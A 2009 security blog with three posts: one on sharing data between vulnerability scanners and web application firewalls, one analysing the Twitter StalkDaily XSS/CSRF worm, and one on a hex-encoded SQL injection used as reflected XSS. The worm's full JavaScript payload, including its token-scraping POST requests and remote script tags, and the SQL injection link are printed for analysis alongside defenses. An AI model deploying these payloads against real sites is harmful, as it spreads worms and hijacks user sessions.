Monday, April 27, 2009

Scanner and WAF Data Sharing

Submitted by Ryan Barnett 04/27/2009

The concept of a web application vulnerability scanner exporting data that is then imported into a web application firewall (WAF) for targeted remediation is not new. In a previous post, I outlined one example of this VA -> WAF data sharing concept where the Whitehat Sentinel service will auto-generate ModSecurity virtual patching rules for specific identified issues. While this concept is certainly attractive to show risk reduction, it is important to realize that you are not constrained to a "one way" data flow. WAFs have access to a tremendous amount of information that it can share with vulnerability scanners in order to make them more effective. VA + WAF should ideally be a symbiotic relationship. Here are a few examples:

When to scan?
Have you ever asked a vulnerability scanning team what their rationale was for their scanning schedule? If not, you might want to do this as the responses may be either illuminating or absolutely frustrating. Unfortunately, most scanning schedules are driven by arbitrary dates to meet minimum requirements (such as quarterly scanning which is mandated by some parent organization). Most scanning is scheduled when it is convenient for the scanning team and is not tailored around any actually intelligence about the target application. Ideally, scanning schedules should be driven around the organizations Change Control processes.

The issue seems to be that most scanning initially leverages the change control process when it is run as a security gate for production when an application is initially being deployed. Then, for some reason, it is set as some arbitrary "time interval" moving forward (once per week, etc...). This scanning is conducted whether or not anything has actually changed within the application. Why is this happening? When discussing this issue with scanning personnel, the overwhelming response is that they scan at set intervals due to a lack of visibility of knowing when an application has actually changed. There is no coordination between the InfoSec/Ops teams to initiate scanning processes when the app changes so they are left with scanning at short intervals in order to be safe.

So, knowing "when to scan" is important. A WAF has a unique positional view of the web application as it is up 24x7 monitoring the traffic. This is in contrast to scanners who take snapshot views of the application when they run. Top tier WAFs are able to profile the web application and identify when the application legitimately changes. In these scenarios, it is a simple matter of setting the appropriate policy actions in order to send out emails to notify the vulnerability scanning staff to immediately initiate a new scan.

What to scan?
It is a somewhat similar scenario to the one mentioned above. Try asking the vulnerability scanning team about their rationale for how they choose "what" to scan. Again, the overwhelming response to this is that they enumerate and scan everything because they have no insight into what has changed in the target application. Understand that there may be reasons for scanning even when the application hasn't changed (such as when a new vulnerability identification check has been created) however this tactic normally results in needless scanning of resources that have not changed.

Similar to the capability outlined in the previous section, not only can a good WAF alert you when an application has changed, but it can also outline exactly which resources have changed. Imagine for a moment that you are in charge of running the scanning processes and if you were able to get an email as soon as a new web resource was deployed or updated and it would outline exactly which resources needed to be scanned. That would result in not only shortening the time to identify a vuln, but it would also significantly reduce the overall scanning time resulting in a more targeted scan.

Scanning Coverage
Another challenge for scanning tools is that of application coverage. Here is another question to ask your vulnerability scanning team - What percentage of the web application do you enumerate during your scans? Answering this question is tricky as it is extremely difficult to accurately gauge a percentage given scanning challenges and the dynamic nature of web applications. The bottom line is that if the scanner can not effectively spider/crawl/index all of the resources, then it obviously can't then conduct vulnerability analysis on it.

The issue of application coverage is another area where WAFs can help scanners. Top WAFs are able to export their learned SITE tree so that they may be used by scanning teams to reconcile the resources. This results not only in greater coverage, but once again, can reduce the overall scanning processes as the crawling phase may be significantly reduced and in some cases excluded all together.

Data sharing between vulnerability scanners and web application firewalls is vitally important for web application remediation efforts. Hopefully this post has helped to demonstrate how the information passing between then tools/processes is not just one-way but is bi-directional. Each one has its own unique perspective on the target application and can provided data to the other that they couldn't necessarily obtain on their own. I believe that the integration of VA+WAF is only going to increase as we move forward.

Monday, April 13, 2009

Twitter Worm - Cross-site Request Forgery Attacks

Submitted by Ryan Barnett 04/13/2009

In case you were too busy hunting for Easter Eggs this past week-end, you may have missed the fact that Twitter was hit with Cross-site Request Forgery worm attacks. Many news outlets are labeling these as Cross-site Scripting Attacks, which is true, however Cross-site Request Forgery is more accurate. Let's look at these definitions:

Cross-site Scripting "occurs whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc." This definition does hold true for the Twitter worms as the malicious payload was sent to user's browsers and it would execute.

Cross-site Request Forgery "attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks." This definition is more accurate as the malicious javascript payload is forcing a logged in Twitter user to update their profile to include the worm javascript. The fact that the javascript code is leveraging the user's session token data to send an unintential request back to the application is the essence of a CSRF attack.

In my previous post I mentioned how it was difficult to neatly place attacks into just one category. Was this an XSS attack or a CSRF attack? In actuality it was both. These worm attacks leveraged a lack of proper output encoding to launch an XSS attack, however the payload itself was CSRF.

The attacks targeted Twitter user's "profile" component and injected javascript similar to the following:

<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js">

The "<script>" data is what was getting injected into people’s profiles. Taking a quick look at the "x.js" script, we see the following:

var update = urlencode("Hey everyone, join www.StalkDaily.com. It’s a site like Twitter but with pictures, videos, and so much more! :)");var xss = urlencode(’http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script>&lt;a ‘);
var ajaxConn = new XHConn();ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

The CSRF code is using an AJAX call to stealthily send the request to Twitter without the user's knowledge. It is issuing a POST command to the "/status/update" page with the appropriate parameter data to modify the "user[url]" data.  Also important to note - Twitter was using a CSRF token (called authenticity_token) to help prevent these types of attacks.  This is the perfect example of why, if your web application has XSS vulnerabilities, that the use of a CSRF token is useless for local attacks.  As you can see in the payload above, the XSS AJAX code is simply scraping the authenticity_token data from within the browser and sending it with the attack payload. 

The Cortesi blog has an excellent technical write-up of what is happening -

What’s happening here is that it looks like somebody realized they could save url encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing somebody’s profile page on Twitter that was already infected. If you visited an infected profile, the JavaScript in the profile would execute and by doing so tweet the mis-leading link, and update your profile with the same malicious JavaScript thereby infecting anybody that then visits your profile on twitter.com.

Defenses/Mitigations - Users
Use the NoScript plugin for Firefox as it will allow you to pick and choose when/where/what javascript you want to allow to run.

Defenses/Mitigations - Web Apps
Disallowing clients from submitting any html code is manageable, however you still need to be able to canonicalize the data before applying any your filters. If done properly, you can simply look for html/scripting tags and data and disallow it entirely. What is challenging is when you have allow your clients to submit html code, however you want to disallow malicious code. Wiki sites, blogs and social media sites such as Twitter have to allow their clients some ability to upload html data. For situation such as this, an applications such as the OWASP AntiSamy package or HTMLPurifier are excellent choices.

Although allowing some level of basic html code changing is understandable, adding in scripting code is different. One aspect of monitoring that can be done (by a web application firewall) is to monitor and track the use of scripting code per resource. By tracking this type of meta-data, you could identify if *any* scripting code is suddenly appearing on a page (when previously there was none) or if there are, say 2 "&lt;script>" tags on a page and now there are 3. This would indicate some sort of an application change. Once alerted to this, the next question is - Was this a legitimate change or something malicious? If Twitter had been using this type of monitoring, they would have been alerted as soon as "Victim Zero" (in this case - the worm originator) altered his profile URL with the encoded Javascript data.

Monday, April 6, 2009

Blended Attacks: Reflected XSS Attack via SQL Injection

Submitted By Ryan Barnett 04/06/2009

More and more of today's web application attacks are leveraging multiple weaknesses/vulnerabilities or attacks in order to achieve a desired exploitation outcome. It is becoming more and more difficult to neatly place an attack into one specific container (such as XSS, SQL Injection, etc...) and instead include many issues together.

One great example of this that I recently ran into was an attack scenario posted to the SANS Advisory Board mail-list. The user had setup some Google Alerts to monitor his public facing web site. He didn't specify the details, however it is assumed that he was attempting to monitor for traditional Google Hacking infoleakage types of problems. In this particular case, the user received a Google Alert email with an odd looking link pointing to a resource on one of his site. The link looked as follows -

<a style=3D"color: blue" href=3D"http://munge.munge.edu/new_skills/workshop/info.php?
wid=3D0+union+select+0x3c736372697074207372633d22687474=703a2f2f
747261662e696e2f632e706870223e3c2f7363726970743e,0x506f726e20747
261=696c657273,0,0,0x416d61746575722073657820766964656f73/*">
Workshops</a><br>

At first glance, it is easy to see that if the user clickes on this link that it would send an SQL Injection attack (due to the union and select keywords and formatting) aimed at the "wid" parameter of the "info.php" web page. What isn't so apparent is the data that is being extracted from the database. The union/select command combination is normally used by attackers to extract data from a DB however this sql query is not specifying any specific tables or columns. The user described that if the link is actually clicked on (which was a bad idea as it actually launched the attack), then the user would be redirected to some porn sites.

So what is happening here?

The data within the SQL Injection query payload is actually Hex encoded. If you decode this data, you will see the following data -

<script src="http://traf.in/c.php"></script>,Porntrailers,0,0,Amateur sex videos/

This javascript would instruct the user's browser to access the c.php script on the traf.in website. If you access this page, it runs some obfuscated javascript which will redirect the user to - http://traf.in/in.cgi?18 - where the number passed to the in.cgi script is a different destination porn site.

The ultimate goal with this attack is to force users to visit these porn sites. The methodology used is -

  1. Attacker identifies a website that has an SQL Injection vulnerability.
  2. They then place web links, that contain the SQL Injection payload targeting the vulnerable site, on other web site.
  3. Googlebot then crawls the attacker's sites and index's the attack weblink.
  4. Anyone running Google searches or in this case who has a Google Alert setup that matched, will receive this malicious link.
  5. If they click on the link, they will launch an SQL Injection attack against the website.
  6. If the SQL Injection is successful, the database will Hex decode the malicious javascript payload and present the data back to the user in html page.
  7. The user will then be redirected to a porn site.

So, while SQL Injection was used in this attack, it was merely a means to an end. It was used as the Reflected XSS target so that it could transform the malicious XSS javascript payload from Hex and send it to the user. This is rather interesting as an evasion mechanism as both Google and the target website may have some basic XSS filters in place to do some input validation blacklisting and this payload might bypass it.

The concept of using SQL Injection as an XSS mechanism to distribute malicious code started with the Mass SQL Injection Bots (Stored XSS as opposed to Reflective XSS in this case) and appears to be continuing as bad guys figure out more and more ways to monetize it.